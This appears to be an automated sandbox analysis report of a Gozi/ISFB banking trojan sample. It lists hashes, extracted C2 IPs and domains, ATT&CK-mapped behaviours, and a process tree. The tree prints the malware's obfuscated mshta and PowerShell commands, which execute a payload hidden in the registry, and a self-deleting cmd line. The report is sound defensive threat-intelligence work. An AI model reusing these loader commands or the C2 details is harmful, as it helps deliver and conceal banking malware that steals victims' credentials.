gozi | 729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab

Analysis

max time kernel
150s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
04-10-2023 18:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab_JC.exe
Size

295KB
MD5

de21fe50192a021dd37b67881fd332ba
SHA1

44c9c72bf5cd81a82ce7870dc765095f303c7fdf
SHA256

729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab
SHA512

6650fe6e0f2866e442a9f753f90fc8aaf594d1d976207a94724f506d840ad6514b4c18392cbc3d51304dd2afb7fadce72f71b385899136b2e593c9fc1eda934a
SSDEEP

3072:F62X2mvtkAa8QoRzUA/nAUZSuJC/w3mA8FfbJ1fzodp/jhNGY:s2XXviAa8QontJF3b8NHfzodpv

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

rsa_pubkey.plain

Extracted

Family

gozi

Botnet

5050

185.247.184.139

62.72.33.155

incontroler.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

mifrutty.com

systemcheck.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation mshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 644 set thread context of 3248	644	powershell.exe	Explorer.EXE
PID 3248 set thread context of 3716	3248	Explorer.EXE	RuntimeBroker.exe
PID 3248 set thread context of 4028	3248	Explorer.EXE	RuntimeBroker.exe
PID 3248 set thread context of 4616	3248	Explorer.EXE	RuntimeBroker.exe
PID 3248 set thread context of 2212	3248	Explorer.EXE	cmd.exe
PID 2212 set thread context of 2832	2212	cmd.exe	PING.EXE
PID 3248 set thread context of 3232	3248	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1520 5028 WerFault.exe 729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab_JC.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2832 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

2832 PING.EXE

pid	pid_target	process	target process
1520	5028	WerFault.exe	729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab_JC.exe

pid	process
2832	PING.EXE

pid	process
2832	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab_JC.exepowershell.exeExplorer.EXE

pid	process
5028	729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab_JC.exe
5028	729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab_JC.exe
644	powershell.exe
644	powershell.exe
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE

Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

644 powershell.exe
3248 Explorer.EXE
3248 Explorer.EXE
3248 Explorer.EXE
3248 Explorer.EXE
2212 cmd.exe
3248 Explorer.EXE

pid	process
644	powershell.exe
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
2212	cmd.exe
3248	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	644	powershell.exe
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3248 Explorer.EXE

pid	process
3248	Explorer.EXE

Suspicious use of WriteProcessMemory 42 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 372 wrote to memory of 644	372	mshta.exe	powershell.exe
PID 372 wrote to memory of 644	372	mshta.exe	powershell.exe
PID 644 wrote to memory of 5056	644	powershell.exe	csc.exe
PID 644 wrote to memory of 5056	644	powershell.exe	csc.exe
PID 5056 wrote to memory of 3080	5056	csc.exe	cvtres.exe
PID 5056 wrote to memory of 3080	5056	csc.exe	cvtres.exe
PID 644 wrote to memory of 516	644	powershell.exe	csc.exe
PID 644 wrote to memory of 516	644	powershell.exe	csc.exe
PID 516 wrote to memory of 4004	516	csc.exe	cvtres.exe
PID 516 wrote to memory of 4004	516	csc.exe	cvtres.exe
PID 644 wrote to memory of 3248	644	powershell.exe	Explorer.EXE
PID 644 wrote to memory of 3248	644	powershell.exe	Explorer.EXE
PID 644 wrote to memory of 3248	644	powershell.exe	Explorer.EXE
PID 644 wrote to memory of 3248	644	powershell.exe	Explorer.EXE
PID 3248 wrote to memory of 3716	3248	Explorer.EXE	RuntimeBroker.exe
PID 3248 wrote to memory of 3716	3248	Explorer.EXE	RuntimeBroker.exe
PID 3248 wrote to memory of 3716	3248	Explorer.EXE	RuntimeBroker.exe
PID 3248 wrote to memory of 3716	3248	Explorer.EXE	RuntimeBroker.exe
PID 3248 wrote to memory of 4028	3248	Explorer.EXE	RuntimeBroker.exe
PID 3248 wrote to memory of 4028	3248	Explorer.EXE	RuntimeBroker.exe
PID 3248 wrote to memory of 2212	3248	Explorer.EXE	cmd.exe
PID 3248 wrote to memory of 2212	3248	Explorer.EXE	cmd.exe
PID 3248 wrote to memory of 2212	3248	Explorer.EXE	cmd.exe
PID 3248 wrote to memory of 4028	3248	Explorer.EXE	RuntimeBroker.exe
PID 3248 wrote to memory of 4028	3248	Explorer.EXE	RuntimeBroker.exe
PID 3248 wrote to memory of 4616	3248	Explorer.EXE	RuntimeBroker.exe
PID 3248 wrote to memory of 4616	3248	Explorer.EXE	RuntimeBroker.exe
PID 3248 wrote to memory of 4616	3248	Explorer.EXE	RuntimeBroker.exe
PID 3248 wrote to memory of 2212	3248	Explorer.EXE	cmd.exe
PID 3248 wrote to memory of 4616	3248	Explorer.EXE	RuntimeBroker.exe
PID 3248 wrote to memory of 2212	3248	Explorer.EXE	cmd.exe
PID 2212 wrote to memory of 2832	2212	cmd.exe	PING.EXE
PID 2212 wrote to memory of 2832	2212	cmd.exe	PING.EXE
PID 2212 wrote to memory of 2832	2212	cmd.exe	PING.EXE
PID 3248 wrote to memory of 3232	3248	Explorer.EXE	cmd.exe
PID 3248 wrote to memory of 3232	3248	Explorer.EXE	cmd.exe
PID 3248 wrote to memory of 3232	3248	Explorer.EXE	cmd.exe
PID 3248 wrote to memory of 3232	3248	Explorer.EXE	cmd.exe
PID 2212 wrote to memory of 2832	2212	cmd.exe	PING.EXE
PID 2212 wrote to memory of 2832	2212	cmd.exe	PING.EXE
PID 3248 wrote to memory of 3232	3248	Explorer.EXE	cmd.exe
PID 3248 wrote to memory of 3232	3248	Explorer.EXE	cmd.exe

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3716

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4616

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4028

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3248

C:\Users\Admin\AppData\Local\Temp\729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab_JC.exe
"C:\Users\Admin\AppData\Local\Temp\729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab_JC.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 472
3⤵
- Program crash
PID:1520

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Nxsh='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nxsh).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\304F83E1-CF18-E2AF-D964-73361DD857CA\\\OperatorAbout'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ivabgu -value gp; new-alias -name ovvbsor -value iex; ovvbsor ([System.Text.Encoding]::ASCII.GetString((ivabgu "HKCU:Software\AppDataLow\Software\Microsoft\304F83E1-CF18-E2AF-D964-73361DD857CA").ClassDocument))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:644

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i2jtbhp0\i2jtbhp0.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:5056

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2A23.tmp" "c:\Users\Admin\AppData\Local\Temp\i2jtbhp0\CSCE33950BF69E44A16AAF4674717C347E2.TMP"
5⤵
PID:3080

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cxuk0kdg\cxuk0kdg.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:516

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2B2D.tmp" "c:\Users\Admin\AppData\Local\Temp\cxuk0kdg\CSCD994207B78EE46099A6126319B8A553.TMP"
5⤵
PID:4004

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab_JC.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2212

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2832

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:3232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 5028 -ip 5028
1⤵
PID:752

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES2A23.tmp
Filesize
1KB

MD5
0418db845d20f640536201cd35423402

SHA1
d8cd8c4dae585dc55e36bf4e313c36ce1e75ac30

SHA256
741ec51b38d3ad518cd3eb355d8a6866e639a410a0b7f52114c7934cfc7f13d4

SHA512
6eed1cbe478adfdb3b5e7a863c697a7b0a27ef59e8c7786d60860feae5e768becb1ba1e1c7022d46d71c4c745dba034eb512ce01c5054801c763d44083a69a40

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2B2D.tmp
Filesize
1KB

MD5
dd1eca5ccde4a6a3dd3cc4993174e004

SHA1
579b511c2fcf169f89a7354eb9cfa29be6b2e28e

SHA256
0d8176f40c044fc3db1a2a6dc942e8279251a9dceb9fac71c901a6fba23d5293

SHA512
c53eb8a99bd8d159b911938805af37902aafe5f752de8c4b593adbe1980358183bb23d8f904f73bffc9e94ed903289f4ec15320de1c7bb02d141ebccbfb6796f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rrzlyeg1.3ic.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cxuk0kdg\cxuk0kdg.dll
Filesize
3KB

MD5
cafff1aa250f5e644c5ff9d250dfe5f7

SHA1
0d68f9a7ff753647a4dfb58ada8604fe87143fa8

SHA256
d4317e91c55780e1871a596a460b578f15521622c7bd0cf3f3551af9eda23be6

SHA512
d8b093acfa8d40fa17a9e58fec534d9439ea7e889739bfb17186966f4da15f592ee059a991bc4a2899e1809426c0c302848fad2c041588029b4b777b90042d64

Download Submit
C:\Users\Admin\AppData\Local\Temp\i2jtbhp0\i2jtbhp0.dll
Filesize
3KB

MD5
6f6a3247bacd2b31e1f716e04b4d07ca

SHA1
dcbc0052d208a744e8eeb6a791b9501b55742bfd

SHA256
de88d89200e38fa002ae61661e454f54fc495499e8f1c89c5573c3f63675157f

SHA512
c99657bd4ac81ead745e79d48018d4b0238b192c6ecca7813e94d0824bf4da0e1f3669ff5b0baaba9daef3879f1771cd56e5862820cf3f9820f837cb161ac38d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cxuk0kdg\CSCD994207B78EE46099A6126319B8A553.TMP
Filesize
652B

MD5
22ded4c56977aab21b9aabfc0ddf8243

SHA1
5c18efe1d8b9c0027c181c266b623602d9817e4a

SHA256
c597e082703209050ccf7b73642cc0bc118248ba5f387cefbf5a545aabe640b8

SHA512
16fffad6841eda9d8db80dd53441cce02492d97b356d0116387be5fbf24a2240b45d372bd82e88227efe978a5b602d8611bebfaee9d5a67938aaffb1463e676f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cxuk0kdg\cxuk0kdg.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cxuk0kdg\cxuk0kdg.cmdline
Filesize
369B

MD5
e0edb164ac8e78f04b8eca23b20c031c

SHA1
3562d4bda58b1345e5a76e114bb0a37e7ded1153

SHA256
cddbdcc62c4c0085e7070f74acc974e1cf9ca0cacc23f1de905b0f5a9c2abe6f

SHA512
fffc909c2220d20d0192bdfd3a8dc6c2f8ac58ae8845425243e2265805c6d7e9f087e99b2c565fa03cb3b1ffde9257cb120efce1f04c084aa0196378a356867a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i2jtbhp0\CSCE33950BF69E44A16AAF4674717C347E2.TMP
Filesize
652B

MD5
d7b14e21cd4813b217b0bc4a4e3a0603

SHA1
89e1cc81fb3d973ba49f8b4920ba4bc2b081345d

SHA256
201334994e9de65462a1ba7eae21198333121164bff093e5e51569af5056aef5

SHA512
1d2d88c151be41a9c4a1aacc1cba3775cbd80724da2c9d42dd8e4c2304264a85d261ee87dfd3bedb0c351671ef6473004af08877da3ccd1934eb9b282e151fff

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i2jtbhp0\i2jtbhp0.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i2jtbhp0\i2jtbhp0.cmdline
Filesize
369B

MD5
77889c991821d93427469142ec3d290a

SHA1
8121325c34e11cd48bd6a9ca092a21d4ad8ea639

SHA256
6d88b4ecbab1c3444f10822f4ccc4e84471f18768a7e9b18e39bdde53794ccb6

SHA512
2af78e19804cbba54643d32bce01e9e6f3daa26b1befa6e36bc99695cfe4dcb45fce4dc850d9e9941090e16da8c579383a2ebccf685e17f41de25d76df552117

Download Submit
memory/644-62-0x0000016570490000-0x00000165704CD000-memory.dmp

Filesize
244KB

Download
memory/644-32-0x000001656FF70000-0x000001656FF80000-memory.dmp

Filesize
64KB

Download
memory/644-33-0x000001656FF70000-0x000001656FF80000-memory.dmp

Filesize
64KB

Download
memory/644-31-0x00007FFA1D6F0000-0x00007FFA1E1B1000-memory.dmp

Filesize
10.8MB

Download
memory/644-26-0x00000165700F0000-0x0000016570112000-memory.dmp

Filesize
136KB

Download
memory/644-71-0x0000016570490000-0x00000165704CD000-memory.dmp

Filesize
244KB

Download
memory/644-46-0x0000016557BB0000-0x0000016557BB8000-memory.dmp

Filesize
32KB

Download
memory/644-60-0x0000016570140000-0x0000016570148000-memory.dmp

Filesize
32KB

Download
memory/644-69-0x00007FFA1D6F0000-0x00007FFA1E1B1000-memory.dmp

Filesize
10.8MB

Download
memory/2212-118-0x000001FC5F9F0000-0x000001FC5FA94000-memory.dmp

Filesize
656KB

Download
memory/2212-95-0x000001FC5F8B0000-0x000001FC5F8B1000-memory.dmp

Filesize
4KB

Download
memory/2212-91-0x000001FC5F9F0000-0x000001FC5FA94000-memory.dmp

Filesize
656KB

Download
memory/2832-110-0x0000018FAD990000-0x0000018FAD991000-memory.dmp

Filesize
4KB

Download
memory/2832-111-0x0000018FADB20000-0x0000018FADBC4000-memory.dmp

Filesize
656KB

Download
memory/2832-102-0x0000018FADB20000-0x0000018FADBC4000-memory.dmp

Filesize
656KB

Download
memory/3232-121-0x0000000001610000-0x00000000016A8000-memory.dmp

Filesize
608KB

Download
memory/3232-112-0x0000000000DE0000-0x0000000000DE1000-memory.dmp

Filesize
4KB

Download
memory/3232-106-0x0000000001610000-0x00000000016A8000-memory.dmp

Filesize
608KB

Download
memory/3232-113-0x0000000001610000-0x00000000016A8000-memory.dmp

Filesize
608KB

Download
memory/3248-64-0x00000000088C0000-0x0000000008964000-memory.dmp

Filesize
656KB

Download
memory/3248-65-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/3248-115-0x00000000088C0000-0x0000000008964000-memory.dmp

Filesize
656KB

Download
memory/3716-77-0x0000023B05E00000-0x0000023B05EA4000-memory.dmp

Filesize
656KB

Download
memory/3716-78-0x0000023B05930000-0x0000023B05931000-memory.dmp

Filesize
4KB

Download
memory/3716-116-0x0000023B05E00000-0x0000023B05EA4000-memory.dmp

Filesize
656KB

Download
memory/4028-83-0x0000021186170000-0x0000021186214000-memory.dmp

Filesize
656KB

Download
memory/4028-84-0x0000021183DC0000-0x0000021183DC1000-memory.dmp

Filesize
4KB

Download
memory/4028-119-0x0000021186170000-0x0000021186214000-memory.dmp

Filesize
656KB

Download
memory/4616-90-0x000001A2CF6F0000-0x000001A2CF794000-memory.dmp

Filesize
656KB

Download
memory/4616-92-0x000001A2CEF90000-0x000001A2CEF91000-memory.dmp

Filesize
4KB

Download
memory/4616-120-0x000001A2CF6F0000-0x000001A2CF794000-memory.dmp

Filesize
656KB

Download
memory/5028-3-0x0000000002360000-0x000000000236B000-memory.dmp

Filesize
44KB

Download
memory/5028-103-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/5028-1-0x0000000002390000-0x0000000002490000-memory.dmp

Filesize
1024KB

Download
memory/5028-2-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/5028-4-0x0000000002390000-0x0000000002490000-memory.dmp

Filesize
1024KB

Download
memory/5028-5-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/5028-6-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/5028-7-0x0000000002380000-0x000000000238D000-memory.dmp

Filesize
52KB

Download